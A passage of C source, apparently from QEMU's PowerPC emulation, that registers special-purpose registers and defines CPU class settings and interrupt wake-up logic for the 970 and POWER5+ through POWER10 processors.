KVM_REG_PPC_ACOP, 0); spr_register_kvm(env, SPR_BOOKS_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PID, 0); } static void gen_spr_power8_rpr(CPUPPCState *env) { spr_register_hv(env, SPR_RPR, "RPR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000103070F1F3F); } static void gen_spr_power9_mmu(CPUPPCState *env) { /* Partition Table Control */ spr_register_kvm_hv(env, SPR_PTCR, "PTCR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_ptcr, KVM_REG_PPC_PTCR, 0x00000000); /* Address Segment Descriptor Register */ spr_register_hv(env, SPR_ASDR, "ASDR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x0000000000000000); } static void init_proc_book3s_common(CPUPPCState *env) { gen_spr_ne_601(env); gen_tbl(env); gen_spr_usprg3(env); gen_spr_book3s_altivec(env); gen_spr_book3s_pmu_sup(env); gen_spr_book3s_pmu_user(env); gen_spr_book3s_ctrl(env); } static void init_proc_970(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_sdr1(env); gen_spr_book3s_dbg(env); /* 970 Specific Registers */ gen_spr_970_hid(env); gen_spr_970_hior(env); gen_low_BATs(env); gen_spr_970_pmu_sup(env); gen_spr_970_pmu_user(env); gen_spr_970_lpar(env); gen_spr_970_dbg(env); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_970(env); ppc970_irq_init(env_archcpu(env)); } POWERPC_FAMILY(970)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 970"; pcc->init_proc = init_proc_970; pcc->check_pow = check_pow_970; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI; pcc->insns_flags2 = PPC2_FP_CVT_S64; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI); pcc->mmu_model = POWERPC_MMU_64B; pcc->handle_mmu_fault = ppc_hash64_handle_mmu_fault; pcc->hash64_opts = &ppc_hash64_opts_basic; pcc->excp_model = POWERPC_EXCP_970; pcc->bus_model = PPC_FLAGS_INPUT_970; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x10000; } static void init_proc_power5plus(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_sdr1(env); gen_spr_book3s_dbg(env); /* POWER5+ Specific Registers */ gen_spr_970_hid(env); gen_spr_970_hior(env); gen_low_BATs(env); gen_spr_970_pmu_sup(env); gen_spr_970_pmu_user(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power5p_tb(env); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_970(env); ppc970_irq_init(env_archcpu(env)); } POWERPC_FAMILY(POWER5P)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER5"; // dc->desc = "POWER5+"; pcc->init_proc = init_proc_power5plus; pcc->check_pow = check_pow_970; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_SEGMENT_64B | PPC_SLBI; pcc->insns_flags2 = PPC2_FP_CVT_S64; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI); pcc->lpcr_mask = LPCR_RMLS | LPCR_ILE | LPCR_LPES0 | LPCR_LPES1 | LPCR_RMI | LPCR_HDICE; pcc->mmu_model = POWERPC_MMU_2_03; pcc->handle_mmu_fault = ppc_hash64_handle_mmu_fault; pcc->hash64_opts = &ppc_hash64_opts_basic; pcc->lrg_decr_bits = 32; pcc->excp_model = POWERPC_EXCP_970; pcc->bus_model = PPC_FLAGS_INPUT_970; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x10000; } static void init_proc_POWER7(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_sdr1(env); gen_spr_book3s_dbg(env); /* POWER7 Specific Registers */ gen_spr_book3s_ids(env); gen_spr_rmor(env); gen_spr_amr(env); gen_spr_book3s_purr(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power5p_tb(env); gen_spr_power6_common(env); gen_spr_power6_dbg(env); gen_spr_power7_book4(env); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_POWER7(env); ppcPOWER7_irq_init(env_archcpu(env)); } static bool ppc_pvr_match_power7(PowerPCCPUClass *pcc, uint32_t pvr) { if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER7P_BASE) { return true; } if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER7_BASE) { return true; } return false; } static bool cpu_has_work_POWER7(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (cs->halted) { if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_EXT)) && (env->spr[SPR_LPCR] & LPCR_P7_PECE0)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DECR)) && (env->spr[SPR_LPCR] & LPCR_P7_PECE1)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_MCK)) && (env->spr[SPR_LPCR] & LPCR_P7_PECE2)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HMI)) && (env->spr[SPR_LPCR] & LPCR_P7_PECE2)) { return true; } if (env->pending_interrupts & (1u << PPC_INTERRUPT_RESET)) { return true; } return false; } else { return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } } POWERPC_FAMILY(POWER7)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER7"; // dc->desc = "POWER7"; pcc->pvr_match = ppc_pvr_match_power7; pcc->pcr_mask = PCR_VEC_DIS | PCR_VSX_DIS | PCR_COMPAT_2_05; pcc->pcr_supported = PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->init_proc = init_proc_POWER7; pcc->check_pow = check_pow_nocheck; cc->has_work = cpu_has_work_POWER7; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_64H | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD | PPC_CILDST; pcc->insns_flags2 = PPC2_VSX | PPC2_DFP | PPC2_DBRX | PPC2_ISA205 | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_FP_CVT_S64 | PPC2_PM_ISA206; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_VR) | (1ull << MSR_VSX) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->lpcr_mask = LPCR_VPM0 | LPCR_VPM1 | LPCR_ISL | LPCR_DPFD | LPCR_VRMASD | LPCR_RMLS | LPCR_ILE | LPCR_P7_PECE0 | LPCR_P7_PECE1 | LPCR_P7_PECE2 | LPCR_MER | LPCR_TC | LPCR_LPES0 | LPCR_LPES1 | LPCR_HDICE; pcc->lpcr_pm = LPCR_P7_PECE0 | LPCR_P7_PECE1 | LPCR_P7_PECE2; pcc->mmu_model = POWERPC_MMU_2_06; pcc->handle_mmu_fault = ppc_hash64_handle_mmu_fault; pcc->hash64_opts = &ppc_hash64_opts_POWER7; pcc->lrg_decr_bits = 32; pcc->excp_model = POWERPC_EXCP_POWER7; pcc->bus_model = PPC_FLAGS_INPUT_POWER7; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_CFAR | POWERPC_FLAG_VSX; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x8000; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_lpcr; } static void init_proc_POWER8(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_sdr1(env); gen_spr_book3s_207_dbg(env); /* POWER8 Specific Registers */ gen_spr_book3s_ids(env); gen_spr_rmor(env); gen_spr_amr(env); gen_spr_iamr(env); gen_spr_book3s_purr(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power5p_tb(env); gen_spr_power6_common(env); gen_spr_power6_dbg(env); gen_spr_power8_tce_address_control(env); gen_spr_power8_ids(env); gen_spr_power8_ebb(env); gen_spr_power8_fscr(env); gen_spr_power8_pmu_sup(env); gen_spr_power8_pmu_user(env); gen_spr_power8_tm(env); gen_spr_power8_pspb(env); gen_spr_power8_dpdes(env); gen_spr_vtb(env); gen_spr_power8_ic(env); gen_spr_power8_book4(env); gen_spr_power8_rpr(env); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_POWER8(env); ppcPOWER7_irq_init(env_archcpu(env)); } static bool ppc_pvr_match_power8(PowerPCCPUClass *pcc, uint32_t pvr) { if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER8NVL_BASE) { return true; } if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER8E_BASE) { return true; } if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER8_BASE) { return true; } return false; } static bool cpu_has_work_POWER8(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (cs->halted) { if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_EXT)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE2)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DECR)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE3)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_MCK)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE4)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HMI)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE4)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DOORBELL)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE0)) { return true; } if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HDOORBELL)) && (env->spr[SPR_LPCR] & LPCR_P8_PECE1)) { return true; } if (env->pending_interrupts & (1u << PPC_INTERRUPT_RESET)) { return true; } return false; } else { return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } } POWERPC_FAMILY(POWER8)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER8"; // dc->desc = "POWER8"; pcc->pvr_match = ppc_pvr_match_power8; pcc->pcr_mask = PCR_TM_DIS | PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->pcr_supported = PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->init_proc = init_proc_POWER8; pcc->check_pow = check_pow_nocheck; cc->has_work = cpu_has_work_POWER8; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_64H | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD | PPC_CILDST; pcc->insns_flags2 = PPC2_VSX | PPC2_VSX207 | PPC2_DFP | PPC2_DBRX | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | PPC2_ALTIVEC_207 | PPC2_ISA205 | PPC2_ISA207S | PPC2_FP_CVT_S64 | PPC2_TM | PPC2_PM_ISA206; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_HV) | (1ull << MSR_TM) | (1ull << MSR_VR) | (1ull << MSR_VSX) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_TS0) | (1ull << MSR_TS1) | (1ull << MSR_LE); pcc->lpcr_mask = LPCR_VPM0 | LPCR_VPM1 | LPCR_ISL | LPCR_KBV | LPCR_DPFD | LPCR_VRMASD | LPCR_RMLS | LPCR_ILE | LPCR_AIL | LPCR_ONL | LPCR_P8_PECE0 | LPCR_P8_PECE1 | LPCR_P8_PECE2 | LPCR_P8_PECE3 | LPCR_P8_PECE4 | LPCR_MER | LPCR_TC | LPCR_LPES0 | LPCR_HDICE; pcc->lpcr_pm = LPCR_P8_PECE0 | LPCR_P8_PECE1 | LPCR_P8_PECE2 | LPCR_P8_PECE3 | LPCR_P8_PECE4; pcc->mmu_model = POWERPC_MMU_2_07; pcc->handle_mmu_fault = ppc_hash64_handle_mmu_fault; pcc->hash64_opts = &ppc_hash64_opts_POWER7; pcc->lrg_decr_bits = 32; pcc->n_host_threads = 8; pcc->excp_model = POWERPC_EXCP_POWER8; pcc->bus_model = PPC_FLAGS_INPUT_POWER7; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_CFAR | POWERPC_FLAG_VSX | POWERPC_FLAG_TM; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x8000; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_lpcr; } /* * Radix pg sizes and AP encodings for dt node ibm,processor-radix-AP-encodings * Encoded as array of int_32s in the form: * 0bxxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyy * x -> AP encoding * y -> radix mode supported page size (encoded as a shift) */ static struct ppc_radix_page_info POWER9_radix_page_info = { .count = 4, .entries = { 0x0000000c, /* 4K - enc: 0x0 */ 0xa0000010, /* 64K - enc: 0x5 */ 0x20000015, /* 2M - enc: 0x1 */ 0x4000001e /* 1G - enc: 0x2 */ } }; static void init_proc_POWER9(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_book3s_207_dbg(env); /* POWER8 Specific Registers */ gen_spr_book3s_ids(env); gen_spr_amr(env); gen_spr_iamr(env); gen_spr_book3s_purr(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power5p_tb(env); gen_spr_power6_common(env); gen_spr_power6_dbg(env); gen_spr_power8_tce_address_control(env); gen_spr_power8_ids(env); gen_spr_power8_ebb(env); gen_spr_power8_fscr(env); gen_spr_power8_pmu_sup(env); gen_spr_power8_pmu_user(env); gen_spr_power8_tm(env); gen_spr_power8_pspb(env); gen_spr_power8_dpdes(env); gen_spr_vtb(env); gen_spr_power8_ic(env); gen_spr_power8_book4(env); gen_spr_power8_rpr(env); gen_spr_power9_mmu(env); /* POWER9 Specific registers */ spr_register_kvm(env, SPR_TIDR, "TIDR", NULL, NULL, spr_read_generic, spr_write_generic, KVM_REG_PPC_TIDR, 0); /* FIXME: Filter fields properly based on privilege level */ spr_register_kvm_hv(env, SPR_PSSCR, "PSSCR", NULL, NULL, NULL, NULL, spr_read_generic, spr_write_generic, KVM_REG_PPC_PSSCR, 0); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_POWER9(env); ppcPOWER9_irq_init(env_archcpu(env)); } static bool ppc_pvr_match_power9(PowerPCCPUClass *pcc, uint32_t pvr) { if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER9_BASE) { return true; } return false; } static bool cpu_has_work_POWER9(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (cs->halted) { uint64_t psscr = env->spr[SPR_PSSCR]; if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } /* If EC is clear, just return true on any pending interrupt */ if (!(psscr & PSSCR_EC)) { return true; } /* External Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_EXT)) && (env->spr[SPR_LPCR] & LPCR_EEE)) { bool heic = !!(env->spr[SPR_LPCR] & LPCR_HEIC); if (heic == 0 || !msr_hv || msr_pr) { return true; } } /* Decrementer Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DECR)) && (env->spr[SPR_LPCR] & LPCR_DEE)) { return true; } /* Machine Check or Hypervisor Maintenance Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_MCK | 1u << PPC_INTERRUPT_HMI)) && (env->spr[SPR_LPCR] & LPCR_OEE)) { return true; } /* Privileged Doorbell Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DOORBELL)) && (env->spr[SPR_LPCR] & LPCR_PDEE)) { return true; } /* Hypervisor Doorbell Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HDOORBELL)) && (env->spr[SPR_LPCR] & LPCR_HDEE)) { return true; } /* Hypervisor virtualization exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HVIRT)) && (env->spr[SPR_LPCR] & LPCR_HVEE)) { return true; } if (env->pending_interrupts & (1u << PPC_INTERRUPT_RESET)) { return true; } return false; } else { return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } } POWERPC_FAMILY(POWER9)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER9"; // dc->desc = "POWER9"; pcc->pvr_match = ppc_pvr_match_power9; pcc->pcr_mask = PCR_COMPAT_2_05 | PCR_COMPAT_2_06 | PCR_COMPAT_2_07; pcc->pcr_supported = PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->init_proc = init_proc_POWER9; pcc->check_pow = check_pow_nocheck; cc->has_work = cpu_has_work_POWER9; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBSYNC | PPC_64B | PPC_64H | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD | PPC_CILDST; pcc->insns_flags2 = PPC2_VSX | PPC2_VSX207 | PPC2_DFP | PPC2_DBRX | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | PPC2_ALTIVEC_207 | PPC2_ISA205 | PPC2_ISA207S | PPC2_FP_CVT_S64 | PPC2_TM | PPC2_ISA300 | PPC2_PRCNTL; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_HV) | (1ull << MSR_TM) | (1ull << MSR_VR) | (1ull << MSR_VSX) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->lpcr_mask = LPCR_VPM1 | LPCR_ISL | LPCR_KBV | LPCR_DPFD | (LPCR_PECE_U_MASK & LPCR_HVEE) | LPCR_ILE | LPCR_AIL | LPCR_UPRT | LPCR_EVIRT | LPCR_ONL | LPCR_HR | LPCR_LD | (LPCR_PECE_L_MASK & (LPCR_PDEE | LPCR_HDEE | LPCR_EEE | LPCR_DEE | LPCR_OEE)) | LPCR_MER | LPCR_GTSE | LPCR_TC | LPCR_HEIC | LPCR_LPES0 | LPCR_HVICE | LPCR_HDICE; pcc->lpcr_pm = LPCR_PDEE | LPCR_HDEE | LPCR_EEE | LPCR_DEE | LPCR_OEE; pcc->mmu_model = POWERPC_MMU_3_00; pcc->handle_mmu_fault = ppc64_v3_handle_mmu_fault; /* segment page size remain the same */ pcc->hash64_opts = &ppc_hash64_opts_POWER7; pcc->radix_page_info = &POWER9_radix_page_info; pcc->lrg_decr_bits = 56; pcc->n_host_threads = 4; pcc->excp_model = POWERPC_EXCP_POWER9; pcc->bus_model = PPC_FLAGS_INPUT_POWER9; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_CFAR | POWERPC_FLAG_VSX | POWERPC_FLAG_TM; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x8000; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_lpcr; } /* * Radix pg sizes and AP encodings for dt node ibm,processor-radix-AP-encodings * Encoded as array of int_32s in the form: * 0bxxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyy * x -> AP encoding * y -> radix mode supported page size (encoded as a shift) */ static struct ppc_radix_page_info POWER10_radix_page_info = { .count = 4, .entries = { 0x0000000c, /* 4K - enc: 0x0 */ 0xa0000010, /* 64K - enc: 0x5 */ 0x20000015, /* 2M - enc: 0x1 */ 0x4000001e /* 1G - enc: 0x2 */ } }; static void init_proc_POWER10(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_book3s_207_dbg(env); /* POWER8 Specific Registers */ gen_spr_book3s_ids(env); gen_spr_amr(env); gen_spr_iamr(env); gen_spr_book3s_purr(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power6_common(env); gen_spr_power6_dbg(env); gen_spr_power8_tce_address_control(env); gen_spr_power8_ids(env); gen_spr_power8_ebb(env); gen_spr_power8_fscr(env); gen_spr_power8_pmu_sup(env); gen_spr_power8_pmu_user(env); gen_spr_power8_tm(env); gen_spr_power8_pspb(env); gen_spr_vtb(env); gen_spr_power8_ic(env); gen_spr_power8_book4(env); gen_spr_power8_rpr(env); gen_spr_power9_mmu(env); /* POWER9 Specific registers */ spr_register_kvm(env, SPR_TIDR, "TIDR", NULL, NULL, spr_read_generic, spr_write_generic, KVM_REG_PPC_TIDR, 0); /* FIXME: Filter fields properly based on privilege level */ spr_register_kvm_hv(env, SPR_PSSCR, "PSSCR", NULL, NULL, NULL, NULL, spr_read_generic, spr_write_generic, KVM_REG_PPC_PSSCR, 0); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_POWER10(env); ppcPOWER9_irq_init(env_archcpu(env)); } static bool ppc_pvr_match_power10(PowerPCCPUClass *pcc, uint32_t pvr) { if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER10_BASE) { return true; } return false; } static bool cpu_has_work_POWER10(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (cs->halted) { uint64_t psscr = env->spr[SPR_PSSCR]; if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } /* If EC is clear, just return true on any pending interrupt */ if (!(psscr & PSSCR_EC)) { return true; } /* External Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_EXT)) && (env->spr[SPR_LPCR] & LPCR_EEE)) { bool heic = !!(env->spr[SPR_LPCR] & LPCR_HEIC); if (heic == 0 || !msr_hv || msr_pr) { return true; } } /* Decrementer Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DECR)) && (env->spr[SPR_LPCR] & LPCR_DEE)) { return true; } /* Machine Check or Hypervisor Maintenance Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_MCK | 1u << PPC_INTERRUPT_HMI)) && (env->spr[SPR_LPCR] & LPCR_OEE)) { return true; } /* Privileged Doorbell Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DOORBELL)) && (env->spr[SPR_LPCR] & LPCR_PDEE)) { return true; } /* Hypervisor Doorbell Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HDOORBELL)) && (env->spr[SPR_LPCR] & LPCR_HDEE)) { return true; } /* Hypervisor virtualization exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HVIRT)) && (env->spr[SPR_LPCR] & LPCR_HVEE)) { return true; } if (env->pending_interrupts & (1u << PPC_INTERRUPT_RESET)) { return true; } return false; } else { return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } } POWERPC_FAMILY(POWER10)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER10"; // dc->desc = "POWER10"; pcc->pvr_match = ppc_pvr_match_power10; pcc->pcr_mask = PCR_COMPAT_2_05 | PCR_COMPAT_2_06 | PCR_COMPAT_2_07 | PCR_COMPAT_3_00; pcc->pcr_supported = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->init_proc = init_proc_POWER10; pcc->check_pow = check_pow_nocheck; cc->has_work = cpu_has_work_POWER10; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | 